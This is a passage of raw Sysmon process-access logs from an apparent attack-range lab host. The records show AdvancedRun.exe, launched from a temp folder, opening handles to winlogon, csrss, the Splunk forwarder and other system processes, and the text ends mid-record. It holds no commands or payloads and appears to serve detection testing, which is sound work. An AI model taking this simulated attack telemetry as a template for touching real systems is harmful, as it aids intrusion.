18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004008599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\App